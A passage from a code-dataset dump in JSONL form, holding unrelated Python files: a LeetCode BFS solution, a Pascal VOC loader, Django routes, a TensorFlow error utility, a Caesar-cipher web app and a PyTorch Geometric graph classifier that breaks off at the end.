NBTStructure,\n observer_pos: Vector,\n max_y: int,\n bottom_block: BlockData,\n input_on_east: bool,\n) -> None:\n structure.set_block(observer_pos, blocks.get_observer(\"up\"))\n pos1 = observer_pos.copy()\n pos1.y -= 1\n structure.set_block(pos1, bottom_block)\n pos1.y += 2\n pos2 = observer_pos.copy()\n pos2.y = max_y\n curr_vol = Cuboid(pos1, pos2)\n structure.fill(curr_vol, blocks.get_flat_wall(is_top=False, dir=\"north\"))\n structure.set_block(pos2, blocks.get_flat_wall(is_top=True, dir=\"north\"))\n pos1.z -= 1\n pos2.z -= 1\n curr_vol = Cuboid(pos1, pos2)\n structure.fill(curr_vol, blocks.neutral_building)\n pos1.z += 2\n pos2.z += 2\n curr_vol = Cuboid(pos1, pos2)\n structure.fill(curr_vol, blocks.neutral_building)\n\n if input_on_east:\n curr_pos = Vector(observer_pos.x + 1, max_y, observer_pos.z)\n structure.set_block(curr_pos, blocks.get_trap_door(\"iron\", \"east\", \"top\"))\n else:\n curr_pos = Vector(observer_pos.x - 1, max_y, observer_pos.z)\n structure.set_block(curr_pos, blocks.get_trap_door(\"iron\", \"west\", \"top\"))\n","repo_name":"BenBenBenB/nbs-structure-generator","sub_path":"nbs_structure_generator/wall_song/generate_wall_song.py","file_name":"generate_wall_song.py","file_ext":"py","file_size_in_byte":33359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18222157232","text":"class Solution:\n def minimumSeconds(self, land: List[List[str]]) -> int:\n self.dirs = [0, 1, 0, -1, 0]\n m = len(land)\n n = len(land[0])\n floodDist = self._getFloodDist(land)\n startPos = self._getStartPos(land, 'S')\n\n q = collections.deque([startPos])\n seen = {startPos}\n\n step = 1\n while q:\n for _ in range(len(q)):\n i, j = q.popleft()\n for k in range(4):\n x = i + self.dirs[k]\n y = j + self.dirs[k + 1]\n if x < 0 or 
x == m or y < 0 or y == n:\n            continue\n          if land[x][y] == 'D':\n            return step\n          if floodDist[x][y] <= step or land[x][y] == 'X' or (x, y) in seen:\n            continue\n          q.append((x, y))\n          seen.add((x, y))\n      step += 1\n\n    return -1\n\n  def _getFloodDist(self, land: List[List[str]]) -> List[List[int]]:\n    m = len(land)\n    n = len(land[0])\n    dist = [[math.inf] * n for _ in range(m)]\n    q = collections.deque()\n    seen = set()\n\n    for i, row in enumerate(land):\n      for j, cell in enumerate(row):\n        if cell == '*':\n          q.append((i, j))\n          seen.add((i, j))\n\n    d = 0\n    while q:\n      for _ in range(len(q)):\n        i, j = q.popleft()\n        dist[i][j] = d\n        for k in range(4):\n          x = i + self.dirs[k]\n          y = j + self.dirs[k + 1]\n          if x < 0 or x == m or y < 0 or y == n:\n            continue\n          if land[x][y] in 'XD' or (x, y) in seen:\n            continue\n          q.append((x, y))\n          seen.add((x, y))\n      d += 1\n\n    return dist\n\n  def _getStartPos(self, land: List[List[str]], c: str) -> Tuple[int, int]:\n    for i, row in enumerate(land):\n      for j, cell in enumerate(row):\n        if cell == c:\n          return i, j\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/2814. Minimum Time Takes to Reach Destination Without Drowning/2814.py","file_name":"2814.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"}
+{"seq_id":"26561049721","text":"# This code wraps global_distribution.py and plots the L-MLT distribution\n# for curtains and flashes.\n\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport global_distribution\n\n# Load the normalization histogram\nL_edges = np.load(os.path.abspath('./normalization/L_edges_norm.npy'))\nMLT_edges = np.load(os.path.abspath('./normalization/MLT_edges_norm.npy'))\nnorm = np.load(os.path.abspath('./normalization/L_MLT_sec_norm.npy')).T+1\n\nfig, axArr = plt.subplots(2, figsize=(15,8), sharex=True)\nfPath = os.path.abspath('./../data/flash_catalogues/flash_catalogue_v2_sorted.txt')\npltObj = global_distribution.GlobalDistribution(fPath, burstType='flashes')\nim = pltObj.rectDistributionPlot(ax=axArr[0], Lbins=L_edges, MLTbins=MLT_edges,\n                                norm=norm)\nplt.colorbar(im, ax=axArr[0], label='Detections (un-normalized)')\n\n# fPath = os.path.abspath('./../data/curtain_catalogues/curtains_catalogue.txt')\n# pltObj = global_distribution.GlobalDistribution(fPath, burstType='curtains')\n# im2 = pltObj.rectDistributionPlot(ax=axArr[1], Lbins=L_edges, MLTbins=MLT_edges,\n#                                 norm=norm)\n# plt.colorbar(im2, ax=axArr[1], label='Detections (un-normalized)')\n\naxArr[0].set(title='Flash distribution', ylabel='L')\n#axArr[1].set(title='Curtain distribution', ylabel='L', xlabel='MLT')\n\nfor ax in axArr:\n    ax.set_aspect('equal')\nplt.tight_layout()\nplt.show()","repo_name":"mshumko/ac6_microburst_scale_sizes","sub_path":"stats/old/L_MLT_distribution.py","file_name":"L_MLT_distribution.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"39052796317","text":"import webapp2\nimport caesar\nimport cgi\n\ndef pageSetup(enc_content):\n    # NOTE: the HTML tags in the strings below are a minimal reconstruction;\n    # the original markup was lost when this file was archived.\n    up_content = '''\n    <html>\n    <head><title>STLCC - LC101 - Web Caesar</title></head>\n    <body>\n    <h1>Web Caesar - STLCC LC101</h1>\n    <br>\n    Please enter some text for conversion:<br>\n    '''\n    text_content = '<textarea name=\"content\" rows=\"10\" cols=\"60\">' + enc_content + '</textarea>'\n    code_content = '''\n    <br>Please enter your encryption code:<br>\n    <input type=\"text\" name=\"code\" />\n    <br>\n    '''\n    button_content = '<input type=\"submit\" value=\"Submit\" />'\n    down_content = '</body></html>'\n    form_start = '<form method=\"post\">'\n    form_end = '</form>'\n    form = form_start + text_content + code_content + button_content + form_end\n    form_content = up_content + form + down_content\n\n    return form_content\n\n\nclass MainHandler(webapp2.RequestHandler):\n\n    def get(self):\n        the_content = pageSetup(\"\")\n        self.response.write(the_content)\n\n\n    def post(self):\n        enc_content = caesar.encrypt(self.request.get(\"content\"), self.request.get(\"code\"))\n        esc_content = cgi.escape(enc_content)\n        the_content = pageSetup(esc_content)\n        self.response.write(the_content)\n\n\napp = webapp2.WSGIApplication([\n    ('/', MainHandler)\n], debug=True)\n","repo_name":"tmaaz/web-caesar","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"42222342704","text":"from utils import get_project_root\nfrom core.creating_features_and_preprocessing.create_raw_features import get_features\nimport numpy as np\nimport keras\n\nclasses = [\"0 - blues\", \"1 - classical\", \"2 - country\", \"3 - disco\", \"4 - hiphop\",\n           \"5 - jazz\", \"6 - metal\", \"7 - pop\", \"8 - reggae\", \"9 - rock\", ]\n\n# directories\nroot_directory = get_project_root()\npreprocessing_directory = f\"{root_directory}/data/preprocessing_parameters/\"\nmodel_save_directory = f\"{root_directory}/saved_models/keras_model/\"\n\n# get parameters for rescaling\nstds = np.load(f\"{preprocessing_directory}/stds.npy\")\nmeans = np.load(f\"{preprocessing_directory}/means.npy\")\n\n# file path for target file\nsample_file_path = f\"{root_directory}/data/genres/blues/blues.00020.au\"\n\nmodel = keras.models.load_model(model_save_directory)\n\nx = get_features(sample_file_path)\nx = (x - means) / stds\nx = np.array(x).reshape(-1,26)\n\noutput = model.predict(x)\noutput_class = np.argmax(output)\nprint(classes[output_class])","repo_name":"benpicker/deep_knn_music_classifier","sub_path":"core/evaluation/keras_evaluate.py","file_name":"keras_evaluate.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"15938877081","text":"\nimport collections\nfrom tensorflow.python.autograph.pyct import origin_info\nfrom tensorflow.python.util import traceback_utils\nclass FrameInfo(\n    collections.namedtuple('FrameInfo',\n                           ('filename', 'lineno', 'function_name', 'code',\n                            'is_converted', 'is_allowlisted'))):\n  __slots__ = ()\ndef _stack_trace_inside_mapped_code(tb, source_map, converter_filename):\n  \"\"\"Summarizes inner traceback frames up to the call to a given function.\n  This function locates the innermost (i.e. most recent) frame that corresponds\n  to code that can be mapped by source_map originated from, and returns a\n  translated stack trace ending at that frame. 
If no such frame is found, the\n  entire stack trace is summarized.\n  For example, the following code:\n    def f():\n      for i in tf.range(1):\n  Would generate this traceback:\n    <converted code>\n        ag__.for_stmt(...)\n    <for_stmt>\n        return _known_len_tf_for_stmt(iter_, extra_test, body, init_state)\n    <_known_len_tf_for_stmt>\n        _disallow_undefs_into_loop(*init_state)\n    <_disallow_undefs_into_loop>\n        raise ...\n  Which is then processed into:\n    <f>\n        for i in tf.range(1):\n    <for_stmt>\n        return _known_len_tf_for_stmt(iter_, extra_test, body, init_state)\n    <_known_len_tf_for_stmt>\n        _disallow_undefs_into_loop(*init_state)\n    <_disallow_undefs_into_loop>\n        raise ...\n  Args:\n    tb: traceback.FrameSummary, The traceback corresponding to an error.\n      Typically, the output of traceback.Summary.extract(capture_locals=True).\n    source_map: Dict[LineLocation, OriginInfo], a source map as created by\n      origin_info.create_source_map.\n    converter_filename: str, the file path of the converted module. Call frames\n      corresponding to this module are elided and their preceding frames are\n      marked as allowlisted. Note that frames enclosing converted code are\n      dropped using a different mechanism.\n  Returns:\n    List[FrameInfo]\n  \"\"\"\n  result_frames = []\n  for filename, line_number, function_name, text in reversed(tb):\n    loc = origin_info.LineLocation(filename=filename, lineno=line_number)\n    if loc in source_map:\n      origin = source_map[loc]\n      fi = FrameInfo(\n          filename=origin.loc.filename,\n          lineno=origin.loc.lineno,\n          function_name=origin.function_name,\n          code=origin.source_code_line,\n          is_converted=True,\n          is_allowlisted=False)\n      result_frames.append(fi)\n      break\n    if filename == converter_filename:\n      if result_frames:\n        prev = result_frames[-1]\n        fi = FrameInfo(\n            filename=prev.filename,\n            lineno=prev.lineno,\n            function_name=prev.function_name,\n            code=prev.code,\n            is_converted=False,\n            is_allowlisted=True)\n        result_frames[-1] = fi\n      continue\n    fi = FrameInfo(\n        filename=filename,\n        lineno=line_number,\n        function_name=function_name,\n        code=text,\n        is_converted=False,\n        is_allowlisted=False)\n    result_frames.append(fi)\n  return tuple(result_frames)\nKNOWN_STRING_CONSTRUCTOR_ERRORS = (\n    AssertionError,\n    AttributeError,\n    NameError,\n    NotImplementedError,\n    RuntimeError,\n    StopIteration,\n    TypeError,\n    UnboundLocalError,\n    ValueError,\n)\nclass MultilineMessageKeyError(KeyError):\n  def __init__(self, message, original_key):\n    super(MultilineMessageKeyError, self).__init__(original_key)\n    self.__message = message\n  def __str__(self):\n    return self.__message\nMultilineMessageKeyError.__name__ = KeyError.__name__\nclass ErrorMetadataBase(object):\n  __slots__ = ('translated_stack', 'cause_message')\n  def __init__(self, callsite_tb, cause_metadata, cause_message, source_map,\n               converter_filename):\n    translated_stack = _stack_trace_inside_mapped_code(\n        callsite_tb, source_map, converter_filename)\n    if cause_metadata is None:\n      self.translated_stack = translated_stack\n      self.cause_message = cause_message\n    else:\n      self.translated_stack = (\n          cause_metadata.translated_stack + (translated_stack[-1],))\n      self.cause_message = cause_metadata.cause_message\n  def get_message(self):\n    lines = []\n    lines.append('in user code:')\n    lines.append('')\n    for frame_info in reversed(self.translated_stack):\n      if (traceback_utils.is_traceback_filtering_enabled() and\n          not traceback_utils.include_frame(frame_info.filename)):\n        continue\n      formatted_line = (f'    File \"{frame_info.filename}\", line '\n                        f'{frame_info.lineno}, in {frame_info.function_name}')\n      if frame_info.is_converted:\n        
formatted_line += ' *'\n elif frame_info.is_allowlisted:\n formatted_line += ' **'\n lines.append(formatted_line)\n if frame_info.code is None:\n code_snippet = ''\n else:\n code_snippet = frame_info.code.strip()\n lines.append(' {}'.format(code_snippet))\n lines.append('')\n message_lines = self.cause_message.split('\\n')\n for i in range(len(message_lines)):\n message_lines[i] = ' ' + message_lines[i]\n lines.extend(message_lines)\n lines.append('')\n return '\\n'.join(lines)\n def create_exception(self, source_error):\n preferred_type = type(source_error)\n to_ret = None\n if preferred_type.__init__ is Exception.__init__:\n to_ret = preferred_type(self.get_message())\n if preferred_type in KNOWN_STRING_CONSTRUCTOR_ERRORS:\n to_ret = preferred_type(self.get_message())\n elif preferred_type is KeyError:\n to_ret = MultilineMessageKeyError(self.get_message(), self.cause_message)\n if to_ret is not None:\n return to_ret.with_traceback(source_error.__traceback__)\n def to_exception(self, source_error):\n exc = self.create_exception(source_error)\n exc.__suppress_context__ = True\n exc.ag_error_metadata = self\n return exc\n","repo_name":"Mockingbird01001/NLG-code-generator-LSTM","sub_path":"work/data/data_model/batch_3/error_utils.py.transformed.py","file_name":"error_utils.py.transformed.py","file_ext":"py","file_size_in_byte":5960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70139983732","text":"# -*- coding: utf-8 -*-\n\n# -*- coding: utf-8 -*-\n\nimport torch\nimport torchvision.transforms.functional as F\nfrom torchvision.datasets.vision import VisionDataset\nfrom torchvision.datasets.voc import download_extract\nfrom PIL import Image\nimport xml.etree.ElementTree as ET\nimport os\nimport collections\nfrom torchvision import transforms\n\nVOC_CLASSES = ('__background__', 'aeroplane', 'bicycle', 'bird', 'boat',\n 'bottle', 'bus', 'car', 'cat', 'chair',\n 'cow', 'diningtable', 'dog', 'horse',\n 'motorbike', 'person', 'pottedplant',\n 'sheep', 'sofa', 'train', 'tvmonitor')\nCLS_TO_IND = {k: v for v, k in enumerate(VOC_CLASSES)}\n \n## between comments taken from the torchvision source code with modifications to include\nDATASET_YEAR_DICT = {\n '2012': { \n 'trainval': {\n 'url': 'http://host.robots.ox.ac.uk/pascal/VOC/voc2012/VOCtrainval_11-May-2012.tar',\n 'filename': 'VOCtrainval_11-May-2012.tar',\n 'md5': '6cd6e144f989b92b3379bac3b3de84fd',\n 'base_dir': 'VOCdevkit/VOC2012'\n },\n 'test': {\n 'url': 'http://pjreddie.com/media/files/VOC2012test.tar',\n 'filename': 'VOC2012test.tar',\n 'md5': '',\n 'base_dir': 'VOCdevkit/VOC2012'\n }\n },\n '2011': {\n 'trainval': {\n 'url': 'http://host.robots.ox.ac.uk/pascal/VOC/voc2011/VOCtrainval_25-May-2011.tar',\n 'filename': 'VOCtrainval_25-May-2011.tar',\n 'md5': '6c3384ef61512963050cb5d687e5bf1e',\n 'base_dir': 'TrainVal/VOCdevkit/VOC2011'\n }\n },\n '2010': {\n 'trainval': {\n 'url': 'http://host.robots.ox.ac.uk/pascal/VOC/voc2010/VOCtrainval_03-May-2010.tar',\n 'filename': 'VOCtrainval_03-May-2010.tar',\n 'md5': 'da459979d0c395079b5c75ee67908abb',\n 'base_dir': 'VOCdevkit/VOC2010'\n }\n },\n '2009': {\n 'trainval': {\n 'url': 'http://host.robots.ox.ac.uk/pascal/VOC/voc2009/VOCtrainval_11-May-2009.tar',\n 'filename': 'VOCtrainval_11-May-2009.tar',\n 'md5': '59065e4b188729180974ef6572f6a212',\n 'base_dir': 'VOCdevkit/VOC2009'\n }\n },\n '2008': {\n 'trainval': {\n 'url': 'http://host.robots.ox.ac.uk/pascal/VOC/voc2008/VOCtrainval_14-Jul-2008.tar',\n 'filename': 
'VOCtrainval_14-Jul-2008.tar',\n            'md5': '2629fa636546599198acfcfbfcf1904a',\n            'base_dir': 'VOCdevkit/VOC2008'\n        }\n    },\n    '2007': {\n        'trainval': {\n            'url': 'http://host.robots.ox.ac.uk/pascal/VOC/voc2007/VOCtrainval_06-Nov-2007.tar',\n            'filename': 'VOCtrainval_06-Nov-2007.tar',\n            'md5': 'c52e279531787c972589f7e41ab4ae64',\n            'base_dir': 'VOCdevkit/VOC2007'\n        },\n        'test': {\n            'url': 'http://host.robots.ox.ac.uk/pascal/VOC/voc2007/VOCtest_06-Nov-2007.tar',\n            'filename': 'VOCtest_06-Nov-2007.tar',\n            'md5': 'b6e924de25625d8de591ea690078ad9f',\n            'base_dir': 'VOCdevkit/VOC2007'\n        }\n    }\n}\n\nclass VOCDetection(VisionDataset):\n    \"\"\"`Pascal VOC <http://host.robots.ox.ac.uk/pascal/VOC/>`_ Detection Dataset.\n    Args:\n        root (string): Root directory of the VOC Dataset.\n        year (string, optional): The dataset year, supports years 2007 to 2012.\n        image_set (string, optional): Select the image_set to use, ``train``, ``trainval`` or ``val``\n        download (bool, optional): If true, downloads the dataset from the internet and\n            puts it in root directory. If dataset is already downloaded, it is not\n            downloaded again.\n            (default: alphabetic indexing of VOC's 20 classes).\n        transform (callable, optional): A function/transform that takes in a PIL image\n            and returns a transformed version. E.g, ``transforms.RandomCrop``\n        target_transform (callable, required): A function/transform that takes in the\n            target and transforms it.\n        transforms (callable, optional): A function/transform that takes input sample and its target as entry\n            and returns a transformed version.\n    \"\"\"\n\n    def __init__(self,\n                 root,\n                 image_set='sbdval',\n                 transform=None,\n                 target_transform=None,\n                 transforms=None):\n        super(VOCDetection, self).__init__(root, transforms, transform, target_transform)\n        self.root = root \n        self.image_set = image_set\n        base_dir = 'VOCdevkit/VOC2012'\n        voc_root = os.path.join(self.root, base_dir)\n        image_dir = os.path.join(voc_root, 'JPEGImages')\n        annotation_dir = os.path.join(voc_root, 'Annotations')\n\n        if not os.path.isdir(voc_root):\n            raise RuntimeError('Dataset not found or corrupted.' +\n                               ' You can use download=True to download it')\n        splits_dir = os.path.join(voc_root, 'ImageSets/Main')\n        split_f = os.path.join(splits_dir, image_set.rstrip('\\n') + '.txt')\n\n        if not os.path.exists(split_f):\n            raise ValueError(\n                'Wrong image_set entered! 
Please use image_set=\"train\" '\n 'or image_set=\"trainval\" or image_set=\"val\" or a valid'\n 'image_set from the VOC ImageSets/Main folder.')\n\n with open(os.path.join(split_f), \"r\") as f:\n file_names = [x.strip() for x in f.readlines()]\n\n self.images = [os.path.join(image_dir, x + \".jpg\") for x in file_names]\n self.annotations = [os.path.join(annotation_dir, x + \".xml\") for x in file_names]\n assert (len(self.images) == len(self.annotations))\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n Returns:\n tuple: (image, target) where target is a dictionary of the XML tree.\n \"\"\"\n img = Image.open(self.images[index]).convert('RGB')\n target = self.parse_voc_xml(\n ET.parse(self.annotations[index]).getroot())\n\n if self.transforms is not None:\n img, target = self.transforms(img, target)\n\n return img, target\n\n def __len__(self):\n return len(self.images)\n\n def parse_voc_xml(self, node):\n voc_dict = {}\n children = list(node)\n if children:\n def_dic = collections.defaultdict(list)\n for dc in map(self.parse_voc_xml, children):\n for ind, v in dc.items():\n def_dic[ind].append(v)\n voc_dict = {\n node.tag:\n {ind: v[0] if len(v) == 1 else v\n for ind, v in def_dic.items()}\n }\n if node.text:\n text = node.text.strip()\n if not children:\n voc_dict[node.tag] = text\n return voc_dict\n \n## End code from elsewhere\nopen_transform = transforms.Compose(\n [transforms.Resize([448, 448]),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n )\n\n\nclass VOCWeak(VOCDetection):\n def __init__(self, \n root,\n image_set='sbdval'):\n super(VOCWeak, self).__init__(root, image_set)\n \n def __getitem__(self, index):\n # img = F.to_tensor(Image.open(self.images[index]).convert('RGB'))\n img = open_transform(Image.open(self.images[index]).convert('RGB'))\n tree = ET.parse(self.annotations[index])\n\n objects = tree.findall('object')\n num_objs = len(objects)\n boxes = torch.zeros((num_objs, 4))\n boxes_cl = torch.zeros((num_objs,)).long()\n \n for i, ob in enumerate(objects):\n bbox = ob.find('bndbox')\n boxes[i, :] = torch.tensor([float(bbox.find('xmin').text),\n float(bbox.find('ymin').text),\n float(bbox.find('xmax').text),\n float(bbox.find('ymax').text)])\n boxes_cl[i] = CLS_TO_IND[ob.find('name').text.lower().strip()]\n\n img_labels = torch.zeros((21,))\n img_labels[boxes_cl] = 1\n\n return img, img_labels, boxes, boxes_cl, tree.find('filename').text[:-4]\n","repo_name":"ZechengLi19/CIM","sub_path":"lib/prm/voc_dataset.py","file_name":"voc_dataset.py","file_ext":"py","file_size_in_byte":8305,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"21"} +{"seq_id":"9394115235","text":"from django.urls import path\r\nfrom . 
import views\r\n\r\nurlpatterns = [\r\n path('', views.home, name=\"home\"),\r\n path('login/', views.loginpage, name=\"login\"),\r\n path('logout/', views.logoutpage, name=\"logout\"),\r\n path('register/', views.registerpage, name=\"register\"),\r\n path('places//', views.place, name=\"places\"),\r\n path('create-place/', views.createplace, name=\"create-place\"),\r\n path('update-place//', views.updateplace, name=\"update-place\"),\r\n path('delete-place//', views.deleteplace, name=\"delete-place\"),\r\n path('delete-comment//', views.deletecomment, name=\"delete-comment\"),\r\n path('user-profile//', views.userprofile, name=\"user-profile\"),\r\n path('update-user/', views.updateuser, name=\"update-user\"),\r\n path('mobile-topic/', views.topicpage, name=\"mobile-topics\"),\r\n path('mobile-activity/', views.activitypage, name=\"mobile-activity\")\r\n]\r\n","repo_name":"linlatt33/python_travel","sub_path":"place/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18747756248","text":"import sys\n\n# Mapping from ANSI to UTF-8\nmapANSI2UTF8 = {\n '\\xB9':'\\xC4\\x85',\n '\\xE6':'\\xC4\\x87',\n '\\xEA':'\\xC4\\x99',\n '\\xB3':'\\xC5\\x82',\n '\\xF1':'\\xC5\\x84',\n '\\xF3':'\\xC3\\xB3',\n '\\x9C':'\\xC5\\x9B',\n '\\x9F':'\\xC5\\xBA',\n '\\xBF':'\\xC5\\xBC',\n '\\xA5':'\\xC4\\x84',\n '\\xC6':'\\xC4\\x86',\n '\\xCA':'\\xC4\\x98',\n '\\xA3':'\\xC5\\x81',\n '\\xD1':'\\xC5\\x83',\n '\\xD3':'\\xC3\\x93',\n '\\x8C':'\\xC5\\x9A',\n '\\x8F':'\\xC5\\xB9',\n '\\xAF':'\\xC5\\xBB'\n }\n\n# Mapping from ANSI to ASCII (in case anyone prefers)\nmapANSI2ASCII = {\n '\\xB9':'a',\n '\\xE6':'c',\n '\\xEA':'e',\n '\\xB3':'l',\n '\\xF1':'n',\n '\\xF3':'o',\n '\\x9C':'s',\n '\\x9F':'z',\n '\\xBF':'z',\n '\\xA5':'A',\n '\\xC6':'C',\n '\\xCA':'E',\n '\\xA3':'L',\n '\\xD1':'N',\n '\\xD3':'O',\n '\\x8C':'S',\n '\\x8F':'Z',\n '\\xAF':'Z'\n }\n\n# Processes a file byte-by-byte and converts Polish characters from ANSI to UTF8\ndef convert(path):\n srt = open(path, 'rb')\n text = '\\xEF\\xBB\\xBF'\n while True:\n byte = srt.read(1)\n if '' == byte:\n break\n if byte in mapANSI2UTF8:\n text += mapANSI2UTF8[byte]\n else:\n text += byte\n srt.close()\n srt = open(path, 'wb')\n srt.write(text)\n srt.close()\n\n# Runs conversion for every file passed as input argument\nfor file in sys.argv[1:]:\n convert(file)\n","repo_name":"altermarkive/python-experiments","sub_path":"convert-polish-ansi-to-utf8/convert_polish_ansi_to_utf8.py","file_name":"convert_polish_ansi_to_utf8.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74220690614","text":"def solution(answers):\n answer = []\n supo1=[1,2,3,4,5]\n supo2=[2,1,2,3,2,4,2,5]\n supo3=[3,3,1,1,2,2,4,4,5,5]\n count = [0,0,0]\n for i,v in enumerate(answers):#learn how to use enumerate: i is the index, v is the value\n if v == supo1[ i %len(supo1)]:#use this to compute the index modulo the length :\n count[0]+=1\n if v == supo2[i%len(supo2)]:#use this to compute the index modulo the length :\n count[1]+=1\n if v == supo3[i%len(supo3)]:#use this to compute the index modulo the length \n count[2]+=1 \n for i,v in enumerate(count):\n if v == max(count):\n answer.append(i+1)\n print(answer)\n return answer","repo_name":"choeyejin12/baekjoon","sub_path":"프로그래머스/lv1/42840. 
모의고사/모의고사.py","file_name":"모의고사.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74066368694","text":"from rat import Rat\r\n\r\n\r\nalice = Rat(\"Alice\")\r\nbob = Rat(\"Bob\")\r\n\r\ntest_dm = alice.dm(\"The cheese stands alone\", bob)\r\ntest_reply = bob.reply(\"Blah blah blah\", test_dm)\r\n\r\nprint(alice)","repo_name":"Kenneth-Siu/chitter-python","sub_path":"chitter.py","file_name":"chitter.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6740755636","text":"import os.path as osp\r\nimport torch, torch_geometric,random\r\nimport torch.nn as nn\r\nfrom torch.utils.data import TensorDataset\r\nfrom torch_geometric.data import Dataset\r\nfrom torch_geometric.data import Data, DataLoader\r\nimport numpy as np\r\nimport torch.nn.functional as F\r\nimport torch.optim as optim\r\nfrom sklearn.utils import shuffle\r\n\r\n\r\nnb_graph = 349\r\ndata_list = [0]\r\nmin_values, max_values = [0 for _ in range(350)], [0 for _ in range(350)]\r\nmin_values[1], max_values[1], max_values[349], idx = 1, 2, 4925, 1\r\n\r\nf = open(\"PTC-FM.graph_idx\", \"r\")\r\nfor row in range(1,4926):\r\n n = int(f.readline())\r\n if n != idx:\r\n max_values[idx] = row - 1\r\n idx += 1\r\n min_values[idx] = row\r\n\r\n\r\n\r\nedgeList_minValues, edgeList_maxValues = [0 for _ in range(350)], [0 for _ in range(350)]\r\nf = open(\"PTC-FM.edges\",\"r\")\r\ngraph_ind = 1\r\nfor row in range(1,54*187+13):\r\n v1,v2 = f.readline().split(sep=\",\")\r\n v1,v2 = int(v1), int(v2)\r\n if v1>max_values[graph_ind]:\r\n edgeList_maxValues[graph_ind] = row - 1\r\n edgeList_minValues[graph_ind + 1] = row\r\n graph_ind += 1\r\n\r\nedgeList_minValues[1], edgeList_maxValues[349] = 1, 54*187+12\r\n\r\n\r\nf_nodeLabels = open(\"PTC-FM.node_labels\",\"r\")\r\nf_edge = open(\"PTC-FM.edges\",\"r\")\r\nf_edgeLabels = open(\"PTC-FM.link_labels\",\"r\")\r\nf_graphLabels = open(\"PTC-FM.graph_labels\",\"r\")\r\n\r\ngraph_ind, edge_ind, node_ind = 1, 1, 1\r\n\r\n\r\n\r\nwhile graph_ind < 350:\r\n nb_node = max_values[graph_ind] - min_values[graph_ind] + 1\r\n x = np.zeros(shape=(nb_node, 18))\r\n for _ in range(nb_node):\r\n lbl = int(f_nodeLabels.readline())\r\n x[_,lbl] = 1\r\n nb_edge = edgeList_maxValues[graph_ind] - edgeList_minValues[graph_ind] + 1\r\n edge1, edge2 = np.array([0 for _ in range(nb_edge)]), np.array([0 for _ in range(nb_edge)])\r\n edge_matrix = np.zeros(shape=(nb_edge, 4))\r\n for _ in range(nb_edge):\r\n v1, v2 = f_edge.readline().split(sep=\",\")\r\n v1, v2 = int(v1), int(v2)\r\n edge1[_], edge2[_] = v1, v2\r\n lbl = int(f_edgeLabels.readline())\r\n edge_matrix[_,lbl] = 1\r\n\r\n edge1, edge2 = edge1-min_values[graph_ind], edge2-min_values[graph_ind]\r\n out_y = 1 if int(f_graphLabels.readline())==1 else 0\r\n y = np.array([out_y])\r\n data_list.append(Data(x=torch.tensor(data=x, dtype=torch.float), edge_attr=torch.tensor(data=edge_matrix, dtype=torch.float),\r\n edge_index=torch.tensor(data=[edge1,edge2], dtype=torch.long),\r\n y = torch.tensor(data=y, dtype=torch.float)))\r\n graph_ind += 1\r\ndel data_list[0]\r\n\r\nloader = DataLoader(data_list, batch_size = 32, shuffle=True)\r\n\r\n\r\n\r\nclass NeuralNetwork(torch.nn.Module):\r\n def __init__(self):\r\n\r\n super(NeuralNetwork,self).__init__()\r\n self.nnconv1 = torch_geometric.nn.NNConv(in_channels=18, out_channels=10, 
nn=torch.nn.Sequential(nn.Linear(in_features=4,out_features=180)))\r\n self.nnconv2 = torch_geometric.nn.NNConv(in_channels=10, out_channels=7, nn=torch.nn.Sequential(nn.Linear(in_features=4, out_features=70)))\r\n self.w1 = torch.nn.Linear(in_features=7,out_features=20,bias=True)\r\n self.w2 = torch.nn.Linear(in_features=20,out_features=10,bias=True)\r\n self.w3 = torch.nn.Linear(in_features=10, out_features=1, bias=True)\r\n\r\n def forward(self, data):\r\n\r\n x, edge_index,edge_attr = data.x, data.edge_index,data.edge_attr\r\n x = self.nnconv1(x,edge_index,edge_attr)\r\n x = self.nnconv2(x,edge_index,edge_attr)\r\n nb_nodes = int(x.shape[0])\r\n cluster = torch.tensor(data=np.zeros(shape=(nb_nodes,)))\r\n btc = torch.tensor(data=np.zeros(shape=(nb_nodes,)))\r\n x = torch_geometric.nn.avg_pool_x(cluster=cluster,x = x,batch=btc)[0]\r\n x = F.relu(self.w1(x))\r\n x = F.relu(self.w2(x))\r\n x = self.w3(x)\r\n x = torch.sigmoid(x)\r\n return x\r\n\r\n\r\n\r\nNetwork = NeuralNetwork()\r\noptimizer = optim.SGD(params=Network.parameters(),lr=0.0005,momentum=0.9)\r\ncriterion = nn.BCELoss()\r\nnb_epoch = 1500\r\ntotal_lost = 0\r\n\r\ndata_list_train = data_list[:299]\r\ndata_list_test = data_list[299:]\r\n\r\nfor _ in range(nb_epoch):\r\n ls = 0\r\n data_list_train = shuffle(data_list_train)\r\n for inp in data_list_train:\r\n optimizer.zero_grad()\r\n out = Network(inp)\r\n out = out.reshape(shape=(1,))\r\n loss = criterion(out,inp.y)\r\n ls += loss.data\r\n loss.backward()\r\n optimizer.step()\r\n 